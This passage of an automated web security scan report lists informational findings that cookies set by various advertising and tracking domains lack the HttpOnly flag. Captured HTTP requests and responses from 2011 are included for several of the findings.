UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDYyMDIwMzSzMACx5Mjgw=; Domain=.overture.com; Path=/; Max-Age=315360000; Expires=Wed, 01-Sep-2021 01:20:48 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js_1_0/?config=1001507650&type=lifestyle&ctxtId=lifestyle&keywordCharEnc=utf8&source=npc_mcclatchy_sacramentobee_t1_ctxt&adwd=728&adht=90&ctxtUrl=http%3A%2F%2Fwww.sacbee.com%2F2011%2F09%2F03%2F3883102%2Fsprint-could-be-winner-in-thwarted.html&ctxtCat=lifestyle&outputCharEnc=latin1&css_url=http://static.mcclatchyinteractive.com/static/styles/mi/third_party/yahoo/yahoo.css&tg=1&refUrl=http%3A%2F%2Fwww.sacbee.com%2F2011%2F09%2F03%2F3883102%2Fsprint-could-be-winner-in-thwarted.html&du=1&cb=1315097138735&ctxtContent=%3Chead%3E%0A%20%0A%0A%0A%0A%0A%0A%0A%0A%3Cscript%20async%3D%22%22%20src%3D%22http%3A%2F%2Fb.scorecardresearch.com%2Fbeacon.js%22%3E%3C%2Fscript%3E%3Cscript%20async%3D%22%22%20src%3D%22http%3A%2F%2Fb.scorecardresearch.com%2Fbeacon.js%22%3E%3C%2Fscript%3E%3Cscript%20language%3D%22JavaScript%22%3E%0A%3C!--%20%0Avar%20gomez%3D%7B%20%0A%09gs%3A%20new%20Date().getTime()%2C%20%0A%09acctId%3A'D3FD89'%2C%20%0A%09pgId%3A'story-detail'%2C%20%0A%09grpId%3A'Sacbee'%20%0A%7D%3B%0A%0A%0A%2F*Gomez%20tag%20version%3A%207.0*%2Fvar%20gomez%3Dgomez%3Fgomez%3A%7B%7D%3Bgomez.h3%3Dfunction(d%2C%20s)%7Bfor(var%20p%20in%20s)%7Bd%5Bp%5D%3Ds%5Bp%5D%3B%7Dreturn%20d%3B%7D%3Bgomez.h3(gomez%2C%7Bb3%3Afunction(r)%7Bif(r%3C%3D0)return%20false%3Breturn%20Math.random()%3C%3Dr%26%26r%3B%7D%2Cb0 HTTP/1.1
Host: cm.npc-mcclatchy.overture.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=228g5ih765ieg&b=3&s=bh

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:20:48 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDYyMDIwMzSzMACx5Mjgw=; Domain=.overture.com; Path=/; Max-Age=315360000; Expires=Wed, 01-Sep-2021 01:20:48 GMT
Cache-Control: no-cache, private
Pragma: no-cache
Expires: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 4565

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<base target="_blank">
<meta http-equiv="Content-Type" content="text/html; charse
...[SNIP]...

14.46. http://cm.npc-mcclatchy.overture.com/partner/js/ypn.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cm.npc-mcclatchy.overture.com
Path:	/partner/js/ypn.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BX=228g5ih765ieg&b=3&s=bh; expires=Tue, 04-Sep-2013 20:00:00 GMT; path=/; domain=.overture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.47. http://companion.adap.tv/companion/post previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://companion.adap.tv
Path:	/companion/post

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

adaptv_unique_user_cookie="-6220387657706691463__TIME__2011-09-03+18%3A22%3A21";Path=/;Domain=.adap.tv;Expires=Tue, 03-Sep-13 01:22:21 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /companion/post HTTP/1.1
Host: companion.adap.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.48. http://control.adap.tv/control previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://control.adap.tv
Path:	/control

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-03+18%3A07%3A39";Path=/;Domain=.adap.tv;Expires=Tue, 03-Sep-13 01:07:39 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /control?context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1&categories=sports&width=300&isTop=true&height=225&as=3&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascar&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&sessionId=25w4w9&htmlEnabled=true&eov=cuv775 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]}}}"

Response

14.49. http://d.p-td.com/r/du/id/L21rdC80L21waWQvMzU5ODk3MA/mpuid/NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.p-td.com
Path:	/r/du/id/L21rdC80L21waWQvMzU5ODk3MA/mpuid/NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

uid=4018048898892878422; Domain=.p-td.com; Expires=Fri, 02-Mar-2012 00:44:15 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.50. http://developers.facebook.com/plugins/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://developers.facebook.com
Path:	/plugins/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

reg_fb_ref=http%3A%2F%2Fdevelopers.facebook.com%2Fplugins%2F; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plugins/ HTTP/1.1
Host: developers.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.51. http://i.w55c.net/ping_match.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://i.w55c.net
Path:	/ping_match.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

wfivefivec=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F;Path=/;Domain=.w55c.net;Expires=Tue, 03-Sep-13 01:06:45 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.52. http://imp.fetchback.com/serve/fb/adtag.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imp.fetchback.com
Path:	/serve/fb/adtag.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

uid=1_1315097051_1314893682667:5756480826433243; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:44:11 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.53. http://imp.fetchback.com/serve/fb/imp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imp.fetchback.com
Path:	/serve/fb/imp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

cre=1_1315097051_34024:68283:2:0:92_34024:68292:2:118888:118970_34023:68293:1:119601:119601; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:44:11 GMT; Path=/
uid=1_1315097051_1314893682667:5756480826433243; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:44:11 GMT; Path=/
kwd=1_1315097051; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:44:11 GMT; Path=/
scg=1_1315097051; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:44:11 GMT; Path=/
ppd=1_1315097051; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:44:11 GMT; Path=/
act=1_1315097051; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:44:11 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.54. http://js.revsci.net/gateway/gw.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://js.revsci.net
Path:	/gateway/gw.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

udm_0=MLvv81MJYS5jpb4vCV71ElxQ9cJHI+OoAkk9e6pq0kVArFRgaSVo+Ku8pFsZ0sSX2gU5VXV/cXD2ShtoxVqM22YeOkkbJabx6POjY2RyZQkpiukWgEaXDEWPclzeoLQZTQRDDL+H9gO5cmv6G5BmbIxHKQ/xj9ssbFNfVI9MGleu9LAj2ntBCzEEkFvJOUQdLKxEkjYP5PF2pFaL/bCBSEyfngKL8aBrvfrsrWAb+or/MloD+pVmtp3nCezdAlVhUp6WcfJNc/sBm/MqRZsVs9JpPXwYog7hu3nLnhmYwoiwGINl4/TJohqQKbb1/aUu4gWV1Gm9KhPW8oqqoX95NFsQYLjqsQT62NLWKaI7s1qJBiSnKXN4AqK+dN4Ny5gElKS/iPUA4xrCNPVGIPmppAxKdpt69rEmB703Ut/V+p1KbirkHdMAW/T95jQMMFrrZRDQpFcnB5Y8PvYehxq0Jic0D+OatsX5+drr53CfRpEt1xhS5Prvg2x8Sz9dpdym+rvaIiObcqaLkbNNA0wR3E4Avt6X8hZN3fw7aWrEId7wJgT5T4TbLDxeBHyZS+biA1AaofPHqCsV8+NCw7j0g4Ko+/g9+zzBKVRsTn5HN27zRVFJ28YDwXVIIo4aLMddoIadm7sqIRe59bhXYV8BH2PF33MO; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:42:17 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.55. http://leadback.advertising.com/adcedge/lb previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://leadback.advertising.com
Path:	/adcedge/lb

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

C2=D+sYO9aFHYIiGS8sQdwSkaIxSKMCdbdBwB; domain=advertising.com; expires=Tue, 03-Sep-2013 01:08:19 GMT; path=/
GUID=MTMxNTA5ODQ5OTsxOjE3NjVpZnUxYWtrYzc5OjM2NQ; domain=advertising.com; expires=Tue, 03-Sep-2013 01:08:19 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.56. http://legolas.nexac.com/lgalt previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://legolas.nexac.com
Path:	/lgalt

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

lgtix=SQACADMB; path=/; expires=Wed, 03 Sep 2014 00:56:05 GMT; domain=.legolas-media.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lgalt?ci=7&ti=73&sti=28&sei=0&sci=2&ai=0&mi=0&pbi=0&sts=1315096943558457&sui=5ea31fa9-d42d-458f-9bb4-1700d69738c0 HTTP/1.1
Host: legolas.nexac.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: na_tc=Y

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:56:05 GMT
Server: Apache
Expires: -1
Cache-Control: no-cache; no-store
Content-Type: image/gif
Set-Cookie: lgtix=SQACADMB; path=/; expires=Wed, 03 Sep 2014 00:56:05 GMT; domain=.legolas-media.com
P3P: policyref="http://www.legolas-media.com/w3c/p3p.xml",CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Length: 42
Connection: close

GIF89a.............!.......,...........D.;

14.57. http://load.exelator.com/load/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://load.exelator.com
Path:	/load/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TFF=eJxLtDK1qi62MjSyUjI0MHEwsDBwsLS0NFKyTrQysqrOtDK0BmJzA3MgZQBj1mKoNwSpN0ZTbwTFyPrM4dqI0wGkDUyINzs1IjUnsSSVOLNrAXTxQVw%253D; expires=Mon, 02-Jan-2012 01:13:04 GMT; path=/; domain=.exelator.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.58. http://log.adap.tv/log previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://log.adap.tv
Path:	/log

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

asptvw1="ap4148%2C2%2C2011-09-03%2F18-44-50";Path=/;Domain=.adap.tv;Expires=Wed, 13-May-2043 03:01:57 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.59. http://nmcharlotte.112.2o7.net/b/ss/nmcharlotte/1/H.20.3/s85129847696516 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://nmcharlotte.112.2o7.net
Path:	/b/ss/nmcharlotte/1/H.20.3/s85129847696516

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

s_vi_efhcjygdx7Fx7Fn=[CS]v4|27316788050129B3-4000010AC034C512|4E62C9FC[CE]; Expires=Fri, 2 Sep 2016 01:06:24 GMT; Domain=.2o7.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.60. http://odb.outbrain.com/utils/get previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://odb.outbrain.com
Path:	/utils/get

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

tick=1315097079013; Domain=outbrain.com; Path=/
_lvs2="RifDljbBnUo="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Sun, 30-Sep-2012 00:44:39 GMT; Path=/
_lvd2="a20VgmTZEaeQlaVAQ/tI3Q=="; Version=1; Domain=outbrain.com; Max-Age=564480; Expires=Sat, 10-Sep-2011 13:32:39 GMT; Path=/
_rcc2="/RlY4kI4x+EC5hF25OSb5Q=="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Sun, 30-Sep-2012 00:44:39 GMT; Path=/
recs-1ac7243e27be1904dc4b28c0c3b41b7f="5sHw/4cdKR1RBwoxQ+NK56Gt39jPhS7BtAFn45s7nNxBJBStyd24vYRw03xty00LSHEMw5NUdblMWfcjIdzz7o0VClIcP3suYYfuX/vSYbkv2mx6/RuYBJJtD16TCm5FO5dLo73fEkx5WOXcO9UcZQ=="; Version=1; Domain=outbrain.com; Max-Age=300; Expires=Sun, 04-Sep-2011 00:49:39 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.61. http://optimized-by.rubiconproject.com/a/4462/5032/7102-15.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/4462/5032/7102-15.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rdk=4462/5032; expires=Sun, 04-Sep-2011 01:45:00 GMT; max-age=60; path=/; domain=.rubiconproject.com
ses15=5032^2&9346^1; expires=Mon, 05-Sep-2011 05:59:59 GMT; max-age=112499; path=/; domain=.rubiconproject.com
csi15=3214998.js^1^1315097100^1315097100&3203911.js^1^1315097079^1315097079; expires=Sun, 11-Sep-2011 00:45:00 GMT; max-age=604800; path=/; domain=.rubiconproject.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.62. http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/4462/5032/7102-2.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rdk=4462/5032; expires=Sun, 04-Sep-2011 01:45:17 GMT; max-age=60; path=/; domain=.rubiconproject.com
ses2=5032^2&9346^1; expires=Mon, 05-Sep-2011 05:59:59 GMT; max-age=112482; path=/; domain=.rubiconproject.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/4462/5032/7102-2.html HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; rpb=7908%3D1%264940%3D1%265364%3D1; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; ruid=154e62c97432177b6a4bcd01^1^1315096948^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=4462/5032; rdk15=0; ses15=5032^1

Response

14.63. http://optimized-by.rubiconproject.com/a/6291/9346/15214-15.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/6291/9346/15214-15.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rdk=6291/9346; expires=Sun, 04-Sep-2011 02:05:03 GMT; max-age=60; path=/; domain=.rubiconproject.com
ses15=5032^19&9346^3; expires=Mon, 05-Sep-2011 05:59:59 GMT; max-age=111296; path=/; domain=.rubiconproject.com
csi15=3203911.js^3^1315097079^1315098303&3225379.js^1^1315097102^1315097102&3164883.js^1^1315097102^1315097102&3214998.js^4^1315097100^1315097102; expires=Sun, 11-Sep-2011 01:05:03 GMT; max-age=604800; path=/; domain=.rubiconproject.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/6291/9346/15214-15.js?cb=0.6276808138936758&fr=false HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; ruid=154e62c97432177b6a4bcd01^1^1315096948^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses15=5032^1; rdk=6291/9346; ses2=5032^1&9346^1; csi2=3214995.js^2^1315096957^1315097051; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%265364%3D1%267751%3D1; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU

Response

14.64. http://optimized-by.rubiconproject.com/a/6291/9346/15214-2.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/6291/9346/15214-2.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rdk=6291/9346; expires=Sun, 04-Sep-2011 02:01:27 GMT; max-age=60; path=/; domain=.rubiconproject.com
ses2=5032^28&9346^3; expires=Mon, 05-Sep-2011 05:59:59 GMT; max-age=111512; path=/; domain=.rubiconproject.com
csi2=3196491.js^2^1315097278^1315098087&3152805.js^1^1315097124^1315097124&224353.js^1^1315097124^1315097124&3220233.js^1^1315097119^1315097119&3222405.js^2^1315097118^1315097119&3164882.js^1^1315097118^1315097118&3214995.js^4^1315096957^1315097118; expires=Sun, 11-Sep-2011 01:01:27 GMT; max-age=604800; path=/; domain=.rubiconproject.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/6291/9346/15214-2.js?cb=0.41656556632369757&fr=false HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; rpb=7908%3D1%264940%3D1%265364%3D1; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; ruid=154e62c97432177b6a4bcd01^1^1315096948^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses15=5032^1; ses2=5032^1; csi2=3214995.js^1^1315096957^1315096957

Response

14.65. http://p.brilig.com/contact/bct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://p.brilig.com
Path:	/contact/bct

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BriligContact=5d4ee69c-99de-419c-8ef9-9d7e686b3586; Domain=.brilig.com; Expires=Tue, 27-Aug-2041 00:53:15 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.66. http://pix04.revsci.net/A11149/a4/0/0/123.302 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/A11149/a4/0/0/123.302

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPFec/C7nMQFlLKHV2YkRHDFZ6XU5/wAHYhBTtuzLxhsncWnsac5BtpDFUZr6/jfDVRBOK9JSmsXJt9DfidaDjiohm3r3xyDiRc0RSYssEkx82iRCT/vqwD6stqoW/kh6uj0O8yCeuP9QjUfquN0IT95gRWIOeIZ5VDzmd1TGncaIJy5Rmt72Y6sBk6eWHFT7d521/0QDr5cvwqaaeOq2sGW8QJkTmvIGA+gr1Jf7nK; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 01:14:02 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.67. http://pix04.revsci.net/D08734/a1/0/0/0.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/D08734/a1/0/0/0.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPFOE/F7gMQlrWdI00GmV2emY3QHv3DVg9B02LswZhakqVFftDs8Pd8XH9p7LJOwoP+gn4nNPri7ZTBvzApv7OPHPbRT1bOas9RWPwMputF602mB2D/7kn26cvKk8znLSqrkUfWnvvP/lQ7FJEAIi/uZ65/PObD+9k+Oks/AIbF67IR+HUIyHvOjU5HxCf9/9FI4F5DDnZWHU17vK5Xoqw1LgsRAwEDgjYhNKRDbKw8H+dTTWvNOLItf3a3CQ==; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:43:12 GMT; Path=/
udm_0=MLvvMFMKYS5nPP4Rh+RGdnVVfFLxImPxWtD/sSVBkUFuSVanMFZpxQEc1dOl8wQX2gnya+3mcehkXLGTZv63Ub6D9Scw0RQb9vO+dM1CYSMm2RgJR1pSPQrPXEAjgiZoGswHX3ZjXHJHQxILRB6aywlWRAagr3+2K0sZ34/KulifkMfi4M9A3Sb6oDvAOEIz+kkvbPXTK9bEp5NP5ywNoNK+eIydxrqbHn6mOAdSeyQnFScThc8RoVZTQXh4pgw82W9ufamncbhh4tM4gRg8KhHEp5ae+NhCfyVpecM3np8H3h3kP4GuQonWNrrnLFv5o+P3bfaxlgye8PHmExPGqkXg30EqL+e6/w62uwo9kDJAODlrBK6f0tXkr71Q3vU831SSjKTupuIueEMZUkYAgS40MDcps9VLym2lj19mm6Qx0EyIt9JfcJAJoxn5lpUZ7b0u78vQhKJTXv4nwq8BCTdEcNvUBaYLWpJ0baJQ8E+tthrXQ48BigEQacf2gCM0PFOSNC8tGdDl1Lv9umcEbOFJd00oX2YeMiDnoPHO0D7/AAOEK9Y62dhDQfMyl4eUItxwEO7/p//8m6lI2QIkKeeSuxO1De0DAS2+8ebTmSaijo0MHpyYmplGc+EYBgN8I16+69gEyHDV/T5auQ8yV5WFnctxm0xyWwrTQ/YfIP2KVQITxxTGpMdelRXGJDYNKQ7SxeZODswAyaET49xlCcfccg==; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:43:12 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.68. http://pix04.revsci.net/D08734/a1/0/3/0.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/D08734/a1/0/3/0.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPFeU/F7gMQlVNWye4WT+7FVcYUPosPyzLn7mCqBpJakqVFftDs8Pd8XH9p7LJOSgsdxA97zNjRBumoSHminWw7EeAr70CWFMXT8ZaoCiV1MiuKvp5QCBbboY8YnCOuCjLvt0/4MIf99AC7ZSY0w5C77Q6CoOArG5YEiepgrvMcmFjpSrPze/ZFTj8/JoWhtW9419+hEUht9d1eloKUu9z3BV+2PuPu; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:42:27 GMT; Path=/
